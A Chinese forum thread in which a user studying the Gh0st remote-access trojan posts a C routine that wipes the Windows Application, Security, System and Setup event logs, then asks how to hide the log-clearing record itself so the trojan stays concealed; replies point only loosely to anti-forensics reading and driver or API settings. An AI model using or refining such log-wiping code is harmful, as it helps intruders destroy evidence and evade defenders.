VC驿站

 找回密码
 加入驿站

QQ登录

只需一步,快速开始

搜索
查看: 1155|回复: 4

[交流] 关于Gh0st清理事件查看器

[复制链接]
75_avatar_middle
最佳答案
0 
在线会员 发表于 7 天前 | 显示全部楼层 |阅读模式
最近在学习Gh0st程序发现一个问题那就是当我们用
void CleanEvent()
{
        char*strEvent[] = { "Application","Security","System","Setup" };
        for (int i = 0; i < sizeof(strEvent) / sizeof(char*); i++)
        {
                HANDLE hHandle = OpenEventLog(NULL, strEvent[i]);
                if (hHandle == NULL)
                {
                        continue;
                }
                ClearEventLog(hHandle, NULL);//清理打开的时间日志
                CloseEventLog(hHandle);//关闭事件句柄
        }
}
清理我们留下的痕迹时  还是会留下两条痕迹看图,  也没有那种方法能彻底抹掉后面出现的2条痕迹,或者躲过
痕迹.png
Ghst.png




上一篇:关于指针不明白的地方,求教大牛。 万分感谢
下一篇:今日一贴!清理系统事件查看器,新手观摩。
75_avatar_middle
最佳答案
0 
ico_lz  楼主| 发表于 7 天前 | 显示全部楼层
我执行完123步骤的时候  我清理了我想清理的痕迹,但是最后在系统事件中出现了,我清理事件的痕迹,这对于木马的隐藏性是致命的,这样人家就知道你清理了该事件,并且在事件详细中列出了详细信息,清理时间,以及ID和hostname
58_avatar_middle
最佳答案
8 
online_vip 发表于 7 天前 | 显示全部楼层
wl1383838438 发表于 2019-12-1 10:53
我执行完123步骤的时候  我清理了我想清理的痕迹,但是最后在系统事件中出现了,我清理事件的痕迹,这对于 ...


Windows好像有对日志处理的API,也有些取证、反取证书籍,我没研究过,你找找吧。
75_avatar_middle
最佳答案
0 
ico_lz  楼主| 发表于 7 天前 | 显示全部楼层
thzzl 发表于 2019-12-1 12:04
Windows好像有对日志处理的API,也有些取证、反取证书籍,我没研究过,你找找吧。

一个老道友,推荐了大概方向说是驱动层有个系统日志开关,可设置,并未详细水,我也不好问太细,毕竟驱动哪块自己是完全不懂,人家也没有办法详细说!谢谢老哥解答
58_avatar_middle
最佳答案
8 
online_vip 发表于 7 天前 | 显示全部楼层
wl1383838438 发表于 2019-12-1 14:31
一个老道友,推荐了大概方向说是驱动层有个系统日志开关,可设置,并未详细水,我也不好问太细,毕竟驱动 ...

API层好像也有相应操作,慢慢来吧。
您需要登录后才可以回帖 登录 | 加入驿站 qq_login

本版积分规则

关闭

站长提醒上一条 /2 下一条

QQ|小黑屋|手机版|VC驿站 ( 辽ICP备09019393号tongdun|网站地图wx_jqr

GMT+8, 2019-12-8 05:19

Powered by Discuz! X3.4

© 2009-2019 cctry.com

快速回复 返回顶部 返回列表